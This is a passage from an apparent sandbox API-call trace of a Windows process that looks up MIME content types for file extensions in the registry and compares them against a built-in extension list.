RegCloseKey (hKey=0x3f2) returned 0x0 [0103.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdu", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.770] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdu", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.770] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.770] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdw", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.770] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.771] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x48) returned 0x0 [0103.771] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2436aec, lpcbData=0x19fc20*=0x48 | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.webapplication", lpcbData=0x19fc20*=0x48) returned 0x0 [0103.771] CharLowerBuffW (in: lpsz="application/msaccess.webapplication", cchLength=0x23 | out: lpsz="application/msaccess.webapplication") returned 0x23 [0103.771] CharLowerBuffW (in: lpsz=".accdw", cchLength=0x6 | out: lpsz=".accdw") returned 0x6 [0103.771] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accft", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.771] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accft", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.771] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x3e) returned 0x0 [0103.771] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2441aac, lpcbData=0x19fc20*=0x3e | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.ftemplate", lpcbData=0x19fc20*=0x3e) returned 0x0 [0103.771] CharLowerBuffW (in: lpsz="application/msaccess.ftemplate", cchLength=0x1e | out: lpsz="application/msaccess.ftemplate") returned 0x1e [0103.771] CharLowerBuffW (in: lpsz=".accft", cchLength=0x6 | out: lpsz=".accft") returned 0x6 [0103.771] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accountpicture-ms", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.771] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accountpicture-ms", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.771] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x46) returned 0x0 [0103.772] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23e0e7c, lpcbData=0x19fc20*=0x46 | out: lpType=0x19fc10*=0x1, lpData="application/windows-accountpicture", lpcbData=0x19fc20*=0x46) returned 0x0 [0103.772] CharLowerBuffW (in: lpsz="application/windows-accountpicture", cchLength=0x22 | out: lpsz="application/windows-accountpicture") returned 0x22 [0103.772] CharLowerBuffW (in: lpsz=".accountpicture-ms", cchLength=0x12 | out: lpsz=".accountpicture-ms") returned 0x12 [0103.772] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".acl", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.772] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".acl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.772] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.772] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".acrobatsecuritysettings", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.772] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".acrobatsecuritysettings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.772] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x60) returned 0x0 [0103.772] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23fee2c, lpcbData=0x19fc20*=0x60 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.adobe.acrobat-security-settings", lpcbData=0x19fc20*=0x60) returned 0x0 [0103.773] CharLowerBuffW (in: lpsz="application/vnd.adobe.acrobat-security-settings", cchLength=0x2f | out: lpsz="application/vnd.adobe.acrobat-security-settings") returned 0x2f [0103.773] CharLowerBuffW (in: lpsz=".acrobatsecuritysettings", cchLength=0x18 | out: lpsz=".acrobatsecuritysettings") returned 0x18 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml=animation/narrative", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac=audio/vnd.dlna.adts", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif=audio/x-aiff", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc=audio/x-aiff", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff=audio/x-aiff", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au=audio/basic", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm=audio/x-gsm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar=audio/midi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/mpegurl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a=audio/x-mpg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid=audio/midi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".midi=audio/midi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpega=audio/x-mpg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=audio/x-mpg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=audio/x-mpg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpga=audio/x-mpg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/x-mpegurl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls=audio/x-scpls", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp=audio/vnd.qcelp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ra=audio/x-realaudio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram=audio/x-pn-realaudio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rm=audio/x-pn-realaudio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2=audio/x-sd2", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid=audio/prs.sid", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd=audio/basic", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav=audio/x-wav", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax=audio/x-ms-wax", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma=audio/x-ms-wma", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".art=image/x-jg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp=image/bmp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdr=image/x-coreldraw", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdt=image/x-coreldrawtemplate", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=image/x-corelphotopaint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djv=image/vnd.djvu", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djvu=image/vnd.djvu", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif=image/gif", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ief=image/ief", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico=image/x-icon", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jng=image/x-jng", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg=image/jpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpeg=image/jpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpe=image/jpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pat=image/x-coreldrawpattern", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pcx=image/pcx", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pbm=image/x-portable-bitmap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pgm=image/x-portable-graymap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pict=image/x-pict", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png=image/x-png", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnm=image/x-portable-anymap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pntg=image/x-macpaint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppm=image/x-portable-pixmap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".psd=image/x-psd", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtif=image/x-quicktime", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ras=image/x-cmu-raster", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rf=image/vnd.rn-realflash", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rgb=image/x-rgb", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rp=image/vnd.rn-realpix", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sgi=image/x-sgi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svg=image/svg+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svgz=image/svg+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".targa=image/x-targa", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".tif=image/x-tiff", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wbmp=image/vnd.wap.wbmp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webp=image/webp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/xbm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/x-xbitmap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xpm=image/x-xpixmap", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xwd=image/x-xwindowdump", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".323=text/h323", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xml=text/xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".uls=text/iuls", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".txt=text/plain", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtx=text/richtext", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wsc=text/scriptlet", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rt=text/vnd.rn-realtext", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htt=text/webviewhtml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htc=text/x-component", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vcf=text/x-vcard", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=video/x-ms-asf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi=video/x-msvideo", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dl=video/dl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dv=video/dv", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flc=video/flc", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fli=video/fli", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gl=video/gl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsf=video/x-la-asf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsx=video/x-la-asf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mng=video/x-mng", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpeg=video/x-mpeg2a", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpa=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpe=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpg=video/mpeg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogv=video/ogg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".moov=video/quicktime", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mov=video/quicktime", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mxu=video/vnd.mpegurl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qt=video/quicktime", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtc=video/x-qtc", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rv=video/vnd.rn-realvideo", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ivf=video/x-ivf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webm=video/webm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wm=video/x-ms-wm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmp=video/x-ms-wmp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmv=video/x-ms-wmv", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wmx=video/x-ms-wmx", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wvx=video/x-ms-wvx", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rms=video/vnd.rn-realvideo-secure", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf-plugin", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".movie=video/x-sgi-movie", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".7z=application/x-7z-compressed", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".a=application/x-archive", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aab=application/x-authorware-bin", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aam=application/x-authorware-map", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aas=application/x-authorware-seg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".abw=application/x-abiword", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ace=application/x-ace-compressed", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 1 [0103.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ai=application/postscript", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".alz=application/x-alz-compressed", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ani=application/x-navi-animation", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arj=application/x-arj", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=application/vnd.ms-asf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bat=application/x-msdos-program", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bcpio=application/x-bcpio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 